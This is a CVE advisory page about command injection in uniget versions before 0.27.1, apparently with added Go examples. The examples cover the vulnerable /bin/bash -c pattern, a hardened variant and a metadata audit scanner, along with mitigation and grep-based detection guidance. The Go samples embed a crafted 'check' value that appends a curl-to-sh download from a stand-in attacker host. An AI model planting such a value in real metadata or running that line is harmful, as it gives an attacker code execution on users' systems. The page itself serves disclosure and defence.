CVE-2026-45152
Deferred - Pending Action
Command Injection in Uniget Prior to 0.27.1

Publication date: 2026-05-27

Last updated on: 2026-06-01

Assigner: GitHub, Inc.

Description
uniget is a universal installer and updater for (container) tools. Prior to 0.27.1, a command injection vulnerability exists in uniget due to unsafe execution of the check field from metadata files using /bin/bash -c. Because the check field is loaded directly from untrusted JSON metadata without validation or sanitization, an attacker can craft malicious metadata that executes arbitrary shell commands on the victim’s system when common uniget operations such as describe, install, update, or inspect are performed. This vulnerability can lead to arbitrary code execution with the privileges of the user running uniget. This vulnerability is fixed in 0.27.1.
Meta Information
Published: 2026-05-27
Last Modified: 2026-06-01
Generated: 2026-06-17
AI Q&A: 2026-05-28
EPSS Evaluated: 2026-06-15
Affected Vendors & Products
Vendor: uniget
Product: uniget
Version / Range: all versions before 0.27.1 (0.27.1 itself is not affected)
CWE
CWE-78: The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Executive Summary

uniget is a universal installer and updater for container tools. Versions before 0.27.1 contain a command injection flaw: the 'check' field of a tool's metadata file is passed to /bin/bash -c without validation or sanitization. Because that field is loaded directly from untrusted JSON metadata, an attacker who can supply crafted metadata gets arbitrary shell commands executed on the victim's system whenever a routine operation such as describe, install, update, or inspect processes that metadata.

The injected commands run with the privileges of the user invoking uniget.
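The following Go program is an added illustration and is not code from uniget or from the advisory. It places the pattern the summary describes (the check string handed verbatim to /bin/bash -c) next to an illustrative hardened variant that rejects shell metacharacters and executes a plain argv with no shell involved. The ToolMetadata struct, the two sample JSON documents, and all function names are constructed for this example; the metadata format is only assumed to carry a top-level "check" string, and the hardened variant is not a description of the fix shipped in uniget 0.27.1.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// ToolMetadata carries the one field the advisory names, "check". The struct
// itself and the "name" field are assumptions made for this example.
type ToolMetadata struct {
	Name  string `json:"name"`
	Check string `json:"check"`
}

// Constructed sample metadata: a benign entry and one whose check field
// carries an injected second command after ";".
const benignJSON = `{"name":"kubectl","check":"kubectl version --client"}`
const maliciousJSON = `{"name":"kubectl","check":"kubectl version --client; curl -s http://attacker.example/p | sh"}`

// parseMetadata decodes a metadata document with no validation at all; this
// is the point at which the untrusted string enters the program.
func parseMetadata(doc string) (ToolMetadata, error) {
	var m ToolMetadata
	if err := json.Unmarshal([]byte(doc), &m); err != nil {
		return ToolMetadata{}, err
	}
	return m, nil
}

// vulnerableCheckCommand reproduces the pattern the advisory describes: the
// whole check string becomes the argument of /bin/bash -c, so the shell
// parses ";", "|" and everything else in it. Building the *exec.Cmd is
// harmless; never call Run on it with untrusted input.
func vulnerableCheckCommand(m ToolMetadata) *exec.Cmd {
	return exec.Command("/bin/bash", "-c", m.Check)
}

// shellMeta matches characters that change how a shell would parse a command
// line. If any of them appear, the string cannot be treated as a plain argv.
var shellMeta = regexp.MustCompile("[;&|$`()<>{}*?\\[\\]~#\\\\\"'\\n]")

// hardenedCheckCommand refuses check strings containing shell metacharacters
// and runs the remainder as an argv directly, without a shell. This is an
// illustrative hardening, not uniget's actual fix.
func hardenedCheckCommand(m ToolMetadata) (*exec.Cmd, error) {
	if loc := shellMeta.FindStringIndex(m.Check); loc != nil {
		return nil, fmt.Errorf("check for %q contains shell metacharacter %q at offset %d",
			m.Name, m.Check[loc[0]:loc[1]], loc[0])
	}
	argv := strings.Fields(m.Check)
	if len(argv) == 0 {
		return nil, fmt.Errorf("check for %q is empty", m.Name)
	}
	// exec.Command with a separate argv never invokes a shell, so "version"
	// and "--client" reach the program as literal arguments.
	return exec.Command(argv[0], argv[1:]...), nil
}

func main() {
	for _, doc := range []string{benignJSON, maliciousJSON} {
		m, err := parseMetadata(doc)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		fmt.Printf("vulnerable argv: %q\n", vulnerableCheckCommand(m).Args)
		cmd, err := hardenedCheckCommand(m)
		if err != nil {
			fmt.Println("hardened: rejected:", err)
			continue
		}
		fmt.Printf("hardened argv:   %q\n", cmd.Args)
	}
}
```

Neither command is executed; inspecting .Args is enough to see that the vulnerable form delivers the entire injected string to bash, while the hardened form either rejects the document or passes literal arguments to the tool. A filter this strict also refuses legitimate check strings that rely on pipes or quoting, so a real fix needs either a structured check format or a trusted metadata source; which route uniget took is not stated on this page.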

Impact Analysis

This vulnerability can lead to arbitrary code execution on your system with the privileges of the user running uniget. An attacker exploiting it could run malicious commands, potentially leading to unauthorized access, data theft, system compromise, or disruption of services. The advisory describes the metadata as untrusted JSON but does not specify how the attacker delivers it; any path by which uniget consumes metadata the attacker controls, such as a tampered or substituted metadata file, is a potential trigger, and no interaction beyond a normal describe, install, update, or inspect is required once that metadata is in place.

Mitigation Strategies

To mitigate this vulnerability, immediately upgrade uniget to version 0.27.1 or later, where the issue is fixed.

Avoid using untrusted or suspicious metadata files with uniget until the upgrade is applied.

Limit the privileges of the user running uniget to reduce potential impact of arbitrary code execution.

Compliance Impact

Because exploitation yields code execution with the privileges of the uniget user, it can result in unauthorized access, data exfiltration, and compromise of the affected host.

Such outcomes bear on compliance with standards and regulations such as GDPR and HIPAA, which require protection of sensitive data and preservation of system integrity; an exploited instance is a potential confidentiality, integrity, and availability violation under those regimes.

Detection Guidance

This vulnerability is command injection through the `check` field in uniget metadata files, which is executed via `/bin/bash -c` without validation. The first step is to determine whether you are running a uniget version prior to 0.27.1.

You can check the installed uniget version by running the following command:

  • uniget --version

If the reported version is 0.27.0 or earlier, the installation is potentially vulnerable and should be upgraded before it processes any further metadata.

To look for metadata files with crafted `check` fields, search the metadata JSON for `check` values containing shell metacharacters. For example:

  • grep -rE '"check"\s*:\s*".*[;|&$()]' /path/to/uniget/metadata/

This searches recursively for `check` fields whose value contains ;, |, &, $, or parentheses. Two caveats apply. First, `\s` is a GNU grep extension; on other grep implementations use `[[:space:]]` instead. Second, the `check` field is by design a command string that the vulnerable versions hand to `/bin/bash -c`, so a legitimate entry may already contain pipes or substitutions; treat matches as candidates for manual review rather than as proof of tampering, and pay particular attention to values that chain a second command with `;`, `&&`, `||`, or `|` onto the expected version check, or that fetch anything over the network.

Additionally, because the vulnerable code path always goes through `/bin/bash -c`, process-creation telemetry that shows uniget spawning a bash child whose command line is not a plain tool version check, or unexpected network activity from that child, is a direct indicator of exploitation during describe, install, update, or inspect operations.
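The program below is an added example, written for this page rather than taken from uniget or the advisory, that turns the two detection steps above into a small Go audit tool: it decides whether an installed version string falls in the affected range (before 0.27.1) and walks a directory of metadata JSON files, flagging every top-level "check" value that contains a shell metacharacter so that a person can review it. The sample metadata files it writes, the directory layout, the assumption that "check" is a top-level string, and all function names are constructed for the example; the metacharacter set is slightly wider than the grep above (it adds backticks, redirections and newlines).

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strconv"
	"strings"
)

// fixedVersion is the first release the advisory names as fixed.
const fixedVersion = "0.27.1"

// parseVersion turns "v0.27.0" or "0.27.0" into [major minor patch]. Any
// pre-release or build suffix such as "-rc1" is dropped (an assumption made
// for this example, not a statement about uniget's version scheme).
func parseVersion(v string) ([3]int, error) {
	v = strings.TrimPrefix(strings.TrimSpace(v), "v")
	if i := strings.IndexAny(v, "-+"); i >= 0 {
		v = v[:i]
	}
	parts := strings.Split(v, ".")
	if len(parts) != 3 {
		return [3]int{}, fmt.Errorf("unrecognised version %q", v)
	}
	var out [3]int
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return [3]int{}, fmt.Errorf("unrecognised version %q", v)
		}
		out[i] = n
	}
	return out, nil
}

// isVulnerableVersion reports whether an installed uniget version is older
// than 0.27.1, the affected range given on this page.
func isVulnerableVersion(installed string) (bool, error) {
	have, err := parseVersion(installed)
	if err != nil {
		return false, err
	}
	fixed, _ := parseVersion(fixedVersion)
	for i := 0; i < 3; i++ {
		if have[i] != fixed[i] {
			return have[i] < fixed[i], nil
		}
	}
	return false, nil
}

// Finding records one metadata file that deserves a human look.
type Finding struct {
	File  string
	Check string
	Meta  string // first metacharacter found, or a parse problem
}

// shellMeta: characters that make a check string more than a single command.
var shellMeta = regexp.MustCompile("[;&|$`()<>\\n]")

// scanMetadataDir walks dir, parses every .json file, and reports check
// fields that contain shell metacharacters. Files that are not valid JSON
// are reported too, since a tampered file may also be a malformed one.
func scanMetadataDir(dir string) ([]Finding, error) {
	var findings []Finding
	err := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		}
		if info.IsDir() || filepath.Ext(path) != ".json" {
			return nil
		}
		raw, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		var doc map[string]interface{}
		if err := json.Unmarshal(raw, &doc); err != nil {
			findings = append(findings, Finding{File: path, Meta: "invalid JSON: " + err.Error()})
			return nil
		}
		check, ok := doc["check"].(string) // assumption: "check" is a top-level string
		if !ok {
			return nil
		}
		if m := shellMeta.FindString(check); m != "" {
			findings = append(findings, Finding{File: path, Check: check, Meta: m})
		}
		return nil
	})
	return findings, err
}

// writeSampleMetadata creates three constructed metadata files: a plain
// version check, a legitimate-looking pipeline (flagged, needs review), and
// an entry that chains a download onto the check (flagged, clearly hostile).
func writeSampleMetadata(dir string) error {
	samples := map[string]string{
		"benign.json":     `{"name":"kubectl","check":"kubectl version --client"}`,
		"pipeline.json":   `{"name":"helm","check":"helm version --short | cut -d+ -f1"}`,
		"suspicious.json": `{"name":"kubectl","check":"kubectl version --client; curl -s http://attacker.example/p | sh"}`,
	}
	for name, body := range samples {
		if err := os.WriteFile(filepath.Join(dir, name), []byte(body), 0o644); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	for _, v := range []string{"0.26.9", "0.27.0", "0.27.1", "0.28.0"} {
		vuln, err := isVulnerableVersion(v)
		fmt.Printf("uniget %s vulnerable=%v err=%v\n", v, vuln, err)
	}
	dir, err := os.MkdirTemp("", "uniget-metadata-")
	if err != nil {
		fmt.Println(err)
		return
	}
	defer os.RemoveAll(dir)
	if err := writeSampleMetadata(dir); err != nil {
		fmt.Println(err)
		return
	}
	findings, err := scanMetadataDir(dir)
	if err != nil {
		fmt.Println(err)
		return
	}
	for _, f := range findings {
		fmt.Printf("%s: %q (first metacharacter %q)\n", filepath.Base(f.File), f.Check, f.Meta)
	}
}
```

Run against a real metadata directory by replacing the temporary directory with the path uniget reads from on your host. The pipeline entry is flagged alongside the hostile one on purpose: a metacharacter scan cannot distinguish a harmless pipe from an injected one, so the output is a review list, and the decisive signal is whether the command after the metacharacter does anything beyond reporting a version.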
